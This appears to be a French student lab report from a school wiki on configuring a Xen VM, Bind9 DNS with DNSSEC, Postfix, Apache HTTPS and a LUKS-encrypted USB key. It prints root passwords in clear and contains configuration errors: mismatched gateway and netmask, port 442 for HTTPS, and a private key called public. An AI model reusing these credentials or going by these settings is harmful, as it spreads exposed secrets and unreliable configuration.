Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54011</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54011"/>
				<updated>2020-11-27T17:06:12Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Services Internet */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168/26&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60a2:216:3eff:fe95:d093/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|http://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|https://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on ajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une passerelle doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interface avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comme ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du réseau===&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
On peux maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
Glue records fournis par Gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié notre DNS a une ip, il faut renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas Gandi ne pourras pas liée les DNS a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveuyrs de non configurer, on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon notre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commencer, on crée un répertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les renommer pour plus de transparence.&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a Gandi comme montrer ci-dessous en n'oubliant pas de sélectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le DNS et représente la chaine d'authentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une messagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérification de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenêtre de configuration s'ouvre. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la réception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les message reçu en tapant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On constate que on reçoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
Pour que Gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoin de pouvoir recevoir les messages qui sont destiné a 'admin@glopglop.site'&lt;br /&gt;
&lt;br /&gt;
Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande &amp;lt;code&amp;gt;admin:root&amp;lt;/code&amp;gt;&lt;br /&gt;
On crée ensuite un &amp;lt;code&amp;gt;newaliases&amp;lt;/code&amp;gt; puis on restarte bind9 avec la commande &amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Attention pour les test il est conseiller d'utilisé deux boite mail différant care celle ci prenne du temps pour se mettre a jours.&lt;br /&gt;
&lt;br /&gt;
====Envoie du SSL Certification Gandi====&lt;br /&gt;
&lt;br /&gt;
Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.&lt;br /&gt;
On demande d'envoyé le ssl certification a notre VM, cela peux prendre un certain temps.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le mail de Gandi on reçoit un code de confirmation ainsi qu'un mot de passe. Une fois confirmer, on peut télécharger les fichiers 'glopglop.site.crt' et 'GandistandardSSLCA2.perm'&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers télécharger et importer dans la Vm dans le dossier '/root', il faut dire que quand on se connecte sur le site 'glopglop.site' en 'https' il dois utilisé la cled publique 'myserver.key'.&lt;br /&gt;
[[Fichier:Gandi-téléchargement_clefetcertifica_mirage.png|1000px|thumb|left|Fichiers Gandi a téléchargé]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
quand on utilise le ssh on passe par le port '442' dans le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/default-ssl.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
On ajoute les lignes suivantes : &lt;br /&gt;
&lt;br /&gt;
 SSLEngine on&lt;br /&gt;
 SSLCertificateFile /root/glopglop.site.crt&lt;br /&gt;
 SSLCertificateKeyFile /root/myserver.key&lt;br /&gt;
 SSLCertificateChainFile /root/GandiStandardSSLCA2.pem &lt;br /&gt;
&lt;br /&gt;
On reboot le service apash2 pour qu'il prenne les modification en compte.&lt;br /&gt;
Le service ne fonctionne pas encore car on a rien qui écoute le port 442. &lt;br /&gt;
 /etc/apache2/sites-available/default-ssl.conf &lt;br /&gt;
 dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
Il ne faut pas oublier d'incrémenter le numéro de version avant de restart le service 'bind9'&lt;br /&gt;
&lt;br /&gt;
On vérifie que tout fonctionne bien avec les commandes : &lt;br /&gt;
 host www.glopglop.site&lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
  &lt;br /&gt;
 host www.glopglop.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 &lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
On peut maintenant vérifier que le site est maintenant bien sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Glopglop.site_Securisé.png|1000px|thumb|left|GlopGlop.site en Https]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on a maintenant un site sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
====Modification de la page d'accueille Apashe2====&lt;br /&gt;
&lt;br /&gt;
Pour éviter d'avoir la page de base Apash2, on va modifier le fichier 'index.html' pour cela il suffit d'éditer le fichier avec vim avec la commande &amp;lt;code&amp;gt;vim /var/www/html/index.html&amp;lt;/code&amp;gt;.&lt;br /&gt;
